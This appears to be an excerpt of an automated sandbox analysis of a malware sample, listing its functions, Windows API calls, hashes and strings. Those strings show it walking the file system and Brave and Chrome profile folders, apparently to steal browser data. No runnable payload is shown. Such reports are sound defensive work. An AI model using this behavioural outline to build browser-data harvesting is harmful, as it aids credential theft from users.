Instruction ID: 6234bca2edf41542b834b912c8642e74a7ff7d28b9391aa95b91764c6ad2550c
Opcode Fuzzy Hash: 1894267bdade2e88736a9571c484462cb95094bdf69f1057654e56dd2360f15e
Instruction Fuzzy Hash: 96419631604206AFCB29CF64C948B7EBBA5FF45310F1581E9EA5E971A1D730A90DC771

Uniqueness

Uniqueness Score: -1.00%

Function 0041A6D4 Relevance: 5.1, APIs: 4, Instructions: 139COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,00000009,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,00000000,00000000,00000000,?), ref: 0041A76A
GetLastError.KERNEL32 ref: 0041A778
MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,00000000), ref: 0041A7D3

Memory Dump Source

Source File: 00000000.00000002.1983816671.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_kO1P1YnLst.jbxd

Similarity

API ID: ByteCharMultiWide$ErrorLast
String ID:
API String ID: 1717984340-0
Opcode ID: 6e686536444b783a84211067d30db666084dfc2c0494af9a85d7f06e58f7e852
Instruction ID: a04565de271e9a0d08a9f39f26722ecfcdc9a59ce40c97fd2178d4ba0242ee74
Opcode Fuzzy Hash: 6e686536444b783a84211067d30db666084dfc2c0494af9a85d7f06e58f7e852
Instruction Fuzzy Hash: 5541E934602246AFCF219F69C9447FB7BB4EF01310F14416AEC6997291D738CDA2C75A

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: u5c4.0.exePID: 416, Parent PID: 6916COMMON

Execution Graph

Execution Coverage:	6.6%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	2.5%
Total number of Nodes:	2000
Total number of Limit Nodes:	30

Executed Functions

Function 00416240 Relevance: 165.7, APIs: 110, Instructions: 674
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcAddress.KERNEL32(74DD0000,04353F98), ref: 0041625D
GetProcAddress.KERNEL32(74DD0000,043541B8), ref: 00416275
GetProcAddress.KERNEL32(74DD0000,04370538), ref: 0041628E
GetProcAddress.KERNEL32(74DD0000,04370568), ref: 004162A6
GetProcAddress.KERNEL32(74DD0000,04370598), ref: 004162BE
GetProcAddress.KERNEL32(74DD0000,043705B0), ref: 004162D7
GetProcAddress.KERNEL32(74DD0000,0436F928), ref: 004162EF
GetProcAddress.KERNEL32(74DD0000,04370508), ref: 00416307
GetProcAddress.KERNEL32(74DD0000,04376510), ref: 00416320
GetProcAddress.KERNEL32(74DD0000,043764F8), ref: 00416338
GetProcAddress.KERNEL32(74DD0000,043763C0), ref: 00416350
GetProcAddress.KERNEL32(74DD0000,04353EB8), ref: 00416369
GetProcAddress.KERNEL32(74DD0000,043540F8), ref: 00416381
GetProcAddress.KERNEL32(74DD0000,04353E98), ref: 00416399
GetProcAddress.KERNEL32(74DD0000,043541F8), ref: 004163B2
GetProcAddress.KERNEL32(74DD0000,04376528), ref: 004163CA
GetProcAddress.KERNEL32(74DD0000,043762D0), ref: 004163E2
GetProcAddress.KERNEL32(74DD0000,0436FAB8), ref: 004163FB
GetProcAddress.KERNEL32(74DD0000,04353ED8), ref: 00416413
GetProcAddress.KERNEL32(74DD0000,04376588), ref: 0041642B
GetProcAddress.KERNEL32(74DD0000,043762A0), ref: 00416444
GetProcAddress.KERNEL32(74DD0000,043762E8), ref: 0041645C
GetProcAddress.KERNEL32(74DD0000,043763A8), ref: 00416474
GetProcAddress.KERNEL32(74DD0000,04354238), ref: 0041648D
GetProcAddress.KERNEL32(74DD0000,043763D8), ref: 004164A5
GetProcAddress.KERNEL32(74DD0000,043762B8), ref: 004164BD
GetProcAddress.KERNEL32(74DD0000,04376498), ref: 004164D6
GetProcAddress.KERNEL32(74DD0000,04376360), ref: 004164EE
GetProcAddress.KERNEL32(74DD0000,04376318), ref: 00416506
GetProcAddress.KERNEL32(74DD0000,04376468), ref: 0041651F
GetProcAddress.KERNEL32(74DD0000,04376378), ref: 00416537
GetProcAddress.KERNEL32(74DD0000,04376330), ref: 0041654F
GetProcAddress.KERNEL32(74DD0000,043764B0), ref: 00416568
GetProcAddress.KERNEL32(74DD0000,04371FE0), ref: 00416580
GetProcAddress.KERNEL32(74DD0000,04376450), ref: 00416598
GetProcAddress.KERNEL32(74DD0000,04376558), ref: 004165B1
GetProcAddress.KERNEL32(74DD0000,04353EF8), ref: 004165C9
GetProcAddress.KERNEL32(74DD0000,04376390), ref: 004165E1
GetProcAddress.KERNEL32(74DD0000,04354158), ref: 004165FA
GetProcAddress.KERNEL32(74DD0000,04376300), ref: 00416612
GetProcAddress.KERNEL32(74DD0000,04376348), ref: 0041662A
GetProcAddress.KERNEL32(74DD0000,04353FB8), ref: 00416643
GetProcAddress.KERNEL32(74DD0000,04354118), ref: 0041665B
LoadLibraryA.KERNEL32(04376438,?,00412CC6,?,00000030,00000064,004132C0,?,0000002C,00000064,00413260,?,00000030,00000064,Function_00013160,?), ref: 0041666D
LoadLibraryA.KERNEL32(043763F0,?,00412CC6,?,00000030,00000064,004132C0,?,0000002C,00000064,00413260,?,00000030,00000064,Function_00013160,?), ref: 0041667E
LoadLibraryA.KERNEL32(04376408,?,00412CC6,?,00000030,00000064,004132C0,?,0000002C,00000064,00413260,?,00000030,00000064,Function_00013160,?), ref: 00416690
LoadLibraryA.KERNEL32(04376420,?,00412CC6,?,00000030,00000064,004132C0,?,0000002C,00000064,00413260,?,00000030,00000064,Function_00013160,?), ref: 004166A2
LoadLibraryA.KERNEL32(04376480,?,00412CC6,?,00000030,00000064,004132C0,?,0000002C,00000064,00413260,?,00000030,00000064,Function_00013160,?), ref: 004166B3
LoadLibraryA.KERNEL32(043764C8,?,00412CC6,?,00000030,00000064,004132C0,?,0000002C,00000064,00413260,?,00000030,00000064,Function_00013160,?), ref: 004166C5
LoadLibraryA.KERNEL32(043764E0,?,00412CC6,?,00000030,00000064,004132C0,?,0000002C,00000064,00413260,?,00000030,00000064,Function_00013160,?), ref: 004166D7
LoadLibraryA.KERNEL32(04376540,?,00412CC6,?,00000030,00000064,004132C0,?,0000002C,00000064,00413260,?,00000030,00000064,Function_00013160,?), ref: 004166E8
GetProcAddress.KERNEL32(75290000,04353F38), ref: 0041670A
GetProcAddress.KERNEL32(75290000,04376570), ref: 00416722
GetProcAddress.KERNEL32(75290000,04370990), ref: 0041673A
GetProcAddress.KERNEL32(75290000,04376618), ref: 00416753
GetProcAddress.KERNEL32(75290000,04354138), ref: 0041676B
GetProcAddress.KERNEL32(734C0000,0436FB08), ref: 00416790
GetProcAddress.KERNEL32(734C0000,04354218), ref: 004167A9
GetProcAddress.KERNEL32(734C0000,0436F8D8), ref: 004167C1
GetProcAddress.KERNEL32(734C0000,04376630), ref: 004167D9
GetProcAddress.KERNEL32(734C0000,04376648), ref: 004167F2
GetProcAddress.KERNEL32(734C0000,043541D8), ref: 0041680A
GetProcAddress.KERNEL32(734C0000,04354038), ref: 00416822
GetProcAddress.KERNEL32(734C0000,04376600), ref: 0041683B
GetProcAddress.KERNEL32(752C0000,04353F18), ref: 0041685C
GetProcAddress.KERNEL32(752C0000,043540D8), ref: 00416874
GetProcAddress.KERNEL32(752C0000,04376660), ref: 0041688D
GetProcAddress.KERNEL32(752C0000,043765A0), ref: 004168A5
GetProcAddress.KERNEL32(752C0000,04354258), ref: 004168BD
GetProcAddress.KERNEL32(74EC0000,0436F900), ref: 004168E3
GetProcAddress.KERNEL32(74EC0000,0436FA68), ref: 004168FB
GetProcAddress.KERNEL32(74EC0000,043765B8), ref: 00416913
GetProcAddress.KERNEL32(74EC0000,04354078), ref: 0041692C
GetProcAddress.KERNEL32(74EC0000,04353F78), ref: 00416944
GetProcAddress.KERNEL32(74EC0000,0436F9F0), ref: 0041695C
GetProcAddress.KERNEL32(75BD0000,043765D0), ref: 00416982
GetProcAddress.KERNEL32(75BD0000,04353F58), ref: 0041699A
GetProcAddress.KERNEL32(75BD0000,04370970), ref: 004169B2
GetProcAddress.KERNEL32(75BD0000,043765E8), ref: 004169CB
GetProcAddress.KERNEL32(75BD0000,04376888), ref: 004169E3
GetProcAddress.KERNEL32(75BD0000,04353FD8), ref: 004169FB
GetProcAddress.KERNEL32(75BD0000,04354278), ref: 00416A14
GetProcAddress.KERNEL32(75BD0000,043768A0), ref: 00416A2C
GetProcAddress.KERNEL32(75BD0000,04376750), ref: 00416A44
GetProcAddress.KERNEL32(75A70000,04353FF8), ref: 00416A66
GetProcAddress.KERNEL32(75A70000,04376918), ref: 00416A7E
GetProcAddress.KERNEL32(75A70000,04376708), ref: 00416A96
GetProcAddress.KERNEL32(75A70000,043767C8), ref: 00416AAF
GetProcAddress.KERNEL32(75A70000,04376870), ref: 00416AC7
GetProcAddress.KERNEL32(75450000,04354178), ref: 00416AE8
GetProcAddress.KERNEL32(75450000,04354018), ref: 00416B01
GetProcAddress.KERNEL32(75DA0000,04354058), ref: 00416B22
GetProcAddress.KERNEL32(75DA0000,04376768), ref: 00416B3A
GetProcAddress.KERNEL32(6F090000,04354098), ref: 00416B60
GetProcAddress.KERNEL32(6F090000,043540B8), ref: 00416B78
GetProcAddress.KERNEL32(6F090000,043774D0), ref: 00416B90
GetProcAddress.KERNEL32(6F090000,043768B8), ref: 00416BA9
GetProcAddress.KERNEL32(6F090000,04377370), ref: 00416BC1
GetProcAddress.KERNEL32(6F090000,043772B0), ref: 00416BD9
GetProcAddress.KERNEL32(6F090000,043772F0), ref: 00416BF2
GetProcAddress.KERNEL32(6F090000,04377570), ref: 00416C0A
GetProcAddress.KERNEL32(75AF0000,04376900), ref: 00416C2B
GetProcAddress.KERNEL32(75AF0000,043708D0), ref: 00416C44
GetProcAddress.KERNEL32(75AF0000,04376930), ref: 00416C5C
GetProcAddress.KERNEL32(75AF0000,043768D0), ref: 00416C74
GetProcAddress.KERNEL32(75D90000,04377550), ref: 00416C96
GetProcAddress.KERNEL32(6CA80000,043768E8), ref: 00416CB7
GetProcAddress.KERNEL32(6CA80000,043774F0), ref: 00416CCF
GetProcAddress.KERNEL32(6CA80000,04376780), ref: 00416CE8
GetProcAddress.KERNEL32(6CA80000,04376948), ref: 00416D00

Memory Dump Source

Source File: 00000001.00000002.2496868143.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2496868143.0000000000448000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2496868143.000000000044B000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2496868143.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2496868143.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2496868143.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5c4.jbxd

Yara matches

Similarity

API ID: AddressProc$LibraryLoad
String ID:
API String ID: 2238633743-0
Opcode ID: ce70c898548f88182f5d017b929846a165f52d01e2510d34cdd7b30da02966dd
Instruction ID: 6fdcbfc83a7e6ced85b92bf4002cf1d70b18d179e1e2f66c0d1faa926a602d30
Opcode Fuzzy Hash: ce70c898548f88182f5d017b929846a165f52d01e2510d34cdd7b30da02966dd
Instruction Fuzzy Hash: 6E623EB5510E10AFC374DFA8FE88A1637ABBBCC311311A519A60AC72A4DF759483CF95

Uniqueness

Uniqueness Score: -1.00%

Function 00411650 Relevance: 44.0, APIs: 20, Strings: 5, Instructions: 237
filestringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

wsprintfA.USER32 ref: 00411669
FindFirstFileA.KERNEL32(?,?), ref: 00411680
lstrcat.KERNEL32(?,?), ref: 004116D2
StrCmpCA.SHLWAPI(?,0041D7F8), ref: 004116E4
StrCmpCA.SHLWAPI(?,0041D7FC), ref: 004116FA
FindNextFileA.KERNELBASE(000000FF,?), ref: 00411980
FindClose.KERNEL32(000000FF), ref: 00411995

Strings

%s%s, xrefs: 00411838
%s\%s\%s, xrefs: 004117DB
%s\%s, xrefs: 00411714
%s\%s, xrefs: 004117FD
%s\*, xrefs: 0041165D

Memory Dump Source

Source File: 00000001.00000002.2496868143.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2496868143.0000000000448000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2496868143.000000000044B000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2496868143.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2496868143.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2496868143.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5c4.jbxd

Yara matches

Similarity

API ID: Find$File$CloseFirstNextlstrcatwsprintf
String ID: %s%s$%s\%s$%s\%s$%s\%s\%s$%s\*
API String ID: 1125553467-2524465048
Opcode ID: dc165bfe059858b008f46a8c8689db8cb5fddec1d4dee71b8375d3b2251b46db
Instruction ID: 56f1237c2d7c520c90c98f1ce5fb3a6d9b51b415e2d0c2f733ce4a2014328567
Opcode Fuzzy Hash: dc165bfe059858b008f46a8c8689db8cb5fddec1d4dee71b8375d3b2251b46db
Instruction Fuzzy Hash: AE9172B19006189BDB24EFA4DC85FEA737DBF88300F044589F61A92191DB789AC5CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 0040B610 Relevance: 37.4, APIs: 17, Strings: 4, Instructions: 675
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82

Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012

Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05

FindFirstFileA.KERNEL32(00000000,?,0041D71A,0041D717,00000000,?,?,?,0041DB54,0041D716), ref: 0040B695
StrCmpCA.SHLWAPI(?,0041DB58), ref: 0040B6ED
StrCmpCA.SHLWAPI(?,0041DB5C), ref: 0040B703
FindNextFileA.KERNELBASE(000000FF,?), ref: 0040BF3B
FindClose.KERNEL32(000000FF), ref: 0040BF4D

Strings

Google Chrome, xrefs: 0040BDB9
Preferences, xrefs: 0040B8BE
\Brave\Preferences, xrefs: 0040B97B
Brave, xrefs: 0040B8A2

Memory Dump Source

Source File: 00000001.00000002.2496868143.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2496868143.0000000000448000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2496868143.000000000044B000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2496868143.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2496868143.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2496868143.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5c4.jbxd

Yara matches

Similarity

API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
String ID: Brave$Google Chrome$Preferences$\Brave\Preferences
API String ID: 3334442632-726946144
Opcode ID: 7c9c9f1912102b1f3f3d451c73bf9befd1c369b3dea277ffdfa703e8cc0b22b3
Instruction ID: 76d401781d3fce7c968e745dc043d6a6225f477281f2400f678919b217ba5a4c
Opcode Fuzzy Hash: 7c9c9f1912102b1f3f3d451c73bf9befd1c369b3dea277ffdfa703e8cc0b22b3
Instruction Fuzzy Hash: 0F423572A0010457CF14FB61DC56EEE773DAF84304F41455EF90AA6181EE38AB89CBE9

Uniqueness

Uniqueness Score: -1.00%

Function 00412570 Relevance: 36.9, APIs: 18, Strings: 3, Instructions: 172
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

wsprintfA.USER32 ref: 00412589
FindFirstFileA.KERNEL32(?,?), ref: 004125A0
StrCmpCA.SHLWAPI(?,0041D864), ref: 004125CE
StrCmpCA.SHLWAPI(?,0041D868), ref: 004125E4
FindNextFileA.KERNEL32(000000FF,?), ref: 004127B9
FindClose.KERNEL32(000000FF), ref: 004127CE

Strings

%s\%s, xrefs: 004125FE
%s\%s, xrefs: 0041264F
%s\*, xrefs: 0041257D

Memory Dump Source

Source File: 00000001.00000002.2496868143.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2496868143.0000000000448000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2496868143.000000000044B000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2496868143.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2496868143.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2496868143.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5c4.jbxd

Yara matches

Similarity

API ID: Find$File$CloseFirstNextwsprintf
String ID: %s\%s$%s\%s$%s\*
API String ID: 180737720-445461498
Opcode ID: 70f66335c68ee9bee9e93ad0ea58b8d0e5d9bc99c8bb7c2902da79831dca3d0c
Instruction ID: 16fd5a9597efbfb91ed0225017393bb16e0f77851f83799e5682f8bc7922baf0
Opcode Fuzzy Hash: 70f66335c68ee9bee9e93ad0ea58b8d0e5d9bc99c8bb7c2902da79831dca3d0c
Instruction Fuzzy Hash: 676156B2900618ABCB24EBE0DD99EEA737DBF58701F00458DB61A96140EF74DB85CF94

Uniqueness

Uniqueness Score: -1.00%

Function 00411B80 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 133
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

wsprintfA.USER32 ref: 00411B9D
FindFirstFileA.KERNEL32(?,?), ref: 00411BB4
StrCmpCA.SHLWAPI(?,0041D834), ref: 00411BE2
StrCmpCA.SHLWAPI(?,0041D838), ref: 00411BF8
FindNextFileA.KERNEL32(000000FF,?), ref: 00411D3D
FindClose.KERNEL32(000000FF), ref: 00411D52

Strings

%s\%s, xrefs: 00411B91

Memory Dump Source

Source File: 00000001.00000002.2496868143.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2496868143.0000000000448000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2496868143.000000000044B000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2496868143.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2496868143.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2496868143.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5c4.jbxd

Yara matches

Similarity

API ID: Find$File$CloseFirstNextwsprintf
String ID: %s\%s
API String ID: 180737720-4073750446
Opcode ID: 8a2a5c367229f5874a14f57b428850a66a498e63ff653c6488f4aaaa7e785072
Instruction ID: 1beca0db89a34a7d9f561fb59a57ff38f1a0216f2a844ef05cbde65d1a44dc5a
Opcode Fuzzy Hash: 8a2a5c367229f5874a14f57b428850a66a498e63ff653c6488f4aaaa7e785072
Instruction Fuzzy Hash: D75168B5900618ABCB24EBB0DC85EEA737DBB48304F40458DB65A96050EB79ABC5CF94

Uniqueness

Uniqueness Score: -1.00%

Function 004015C0 Relevance: 14.5, APIs: 7, Strings: 1, Instructions: 492fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,004215C4,?,00401E03,?,004215C8,?,?,00000000,?,00000000), ref: 00401813
StrCmpCA.SHLWAPI(?,004215CC), ref: 00401863
StrCmpCA.SHLWAPI(?,004215D0), ref: 00401879
CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00401C30
DeleteFileA.KERNEL32(00000000), ref: 00401CB4
FindNextFileA.KERNEL32(000000FF,?), ref: 00401D0A
FindClose.KERNEL32(000000FF), ref: 00401D1C

Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82

Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012

Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05

Strings

\*.*, xrefs: 004016E1

Memory Dump Source

Source File: 00000001.00000002.2496868143.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2496868143.0000000000448000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2496868143.000000000044B000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2496868143.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2496868143.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2496868143.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5c4.jbxd

Yara matches

Similarity

API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
String ID: \*.*
API String ID: 1415058207-1173974218
Opcode ID: f8b2ac61337480ab1d8cc55f87738a585f7c4a46595bf6ff6cbfdc8e476e5ad3
Instruction ID: 3aa4ae790513c502dab12fd0122e5550b13815c0fff8c800b600eb4522263f51
Opcode Fuzzy Hash: f8b2ac61337480ab1d8cc55f87738a585f7c4a46595bf6ff6cbfdc8e476e5ad3
Instruction Fuzzy Hash: D41225759102189BCB15FB61DC56EEE7739AF54308F41419EB10A62091EF38AFC9CFA8

Uniqueness

Uniqueness Score: -1.00%

Function 0040D1C0 Relevance: 13.8, APIs: 9, Instructions: 255fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82

Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012

Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05

FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,0041DC10,0041D73F), ref: 0040D22B
StrCmpCA.SHLWAPI(?,0041DC14), ref: 0040D273
StrCmpCA.SHLWAPI(?,0041DC18), ref: 0040D289
FindNextFileA.KERNELBASE(000000FF,?), ref: 0040D4EE
FindClose.KERNEL32(000000FF), ref: 0040D500

Memory Dump Source

Source File: 00000001.00000002.2496868143.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2496868143.0000000000448000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2496868143.000000000044B000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2496868143.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2496868143.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2496868143.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5c4.jbxd

Yara matches

Similarity

API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
String ID:
API String ID: 3334442632-0
Opcode ID: 8fa573c4bf8f32931b9ea9eba06e67935ab5fae2b205d85bdf9771007900e629
Instruction ID: a7e743a2a4f5118c59e4eb5b7e6cabc454f6fbff0e67e47d23a58287cf68124a
Opcode Fuzzy Hash: 8fa573c4bf8f32931b9ea9eba06e67935ab5fae2b205d85bdf9771007900e629
Instruction Fuzzy Hash: 63913B72A0020497CB14FFB1EC569EE777DAB84308F41466EF90A96581EE38D788CBD5

Uniqueness

Uniqueness Score: -1.00%

Function 00414570 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 97memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

GetKeyboardLayoutList.USER32(00000000,00000000,0041D146), ref: 0041459E
LocalAlloc.KERNEL32(00000040,?), ref: 004145B6
GetKeyboardLayoutList.USER32(?,00000000), ref: 004145CA
GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 0041461F
LocalFree.KERNEL32(00000000), ref: 004146DF

Strings

/ , xrefs: 0041463C

Memory Dump Source

Source File: 00000001.00000002.2496868143.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2496868143.0000000000448000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2496868143.000000000044B000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2496868143.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2496868143.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2496868143.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5c4.jbxd

Yara matches

Similarity

API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
String ID: /
API String ID: 3090951853-4001269591
Opcode ID: b3ae68a3938c9e06bcd6eabfd82ee92d7aff8f0056ccf05280facd273a8cc3fa
Instruction ID: e4a09482d03fe0ac07b2aa12fe49ef9b635f824a972481fa3f662a7a2871ed61
Opcode Fuzzy Hash: b3ae68a3938c9e06bcd6eabfd82ee92d7aff8f0056ccf05280facd273a8cc3fa
Instruction Fuzzy Hash: D5413B74940218ABCB24DF50DC89BEDB775BB54308F2042DAE10A66191DB786FC5CF54

Uniqueness

Uniqueness Score: -1.00%

Function 0040DB60 Relevance: 9.3, APIs: 4, Strings: 1, Instructions: 514fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82

Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012

Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05

FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\*.*,0041D74E), ref: 0040DBD2
StrCmpCA.SHLWAPI(?,0041DC58), ref: 0040DC22
StrCmpCA.SHLWAPI(?,0041DC5C), ref: 0040DC38
FindNextFileA.KERNEL32(000000FF,?), ref: 0040E306

Strings

\*.*, xrefs: 0040DB7D

Memory Dump Source

Source File: 00000001.00000002.2496868143.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2496868143.0000000000448000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2496868143.000000000044B000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2496868143.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2496868143.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2496868143.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5c4.jbxd

Yara matches

Similarity

API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
String ID: \*.*
API String ID: 433455689-1173974218
Opcode ID: f7475b116a4597a1daddea1d9ec65d66a476fb48a19e70ace4414c8071cd6ccd
Instruction ID: 8f23b39e961a58df861ec407c7814dc8b58ae9c3eb94c511c30fb23e96a564a4
Opcode Fuzzy Hash: f7475b116a4597a1daddea1d9ec65d66a476fb48a19e70ace4414c8071cd6ccd
Instruction Fuzzy Hash: 88126771A002145ACB14FB61DC56EED7739AF54308F4142AEB50A66091EF389FC8CFE8

Uniqueness

Uniqueness Score: -1.00%

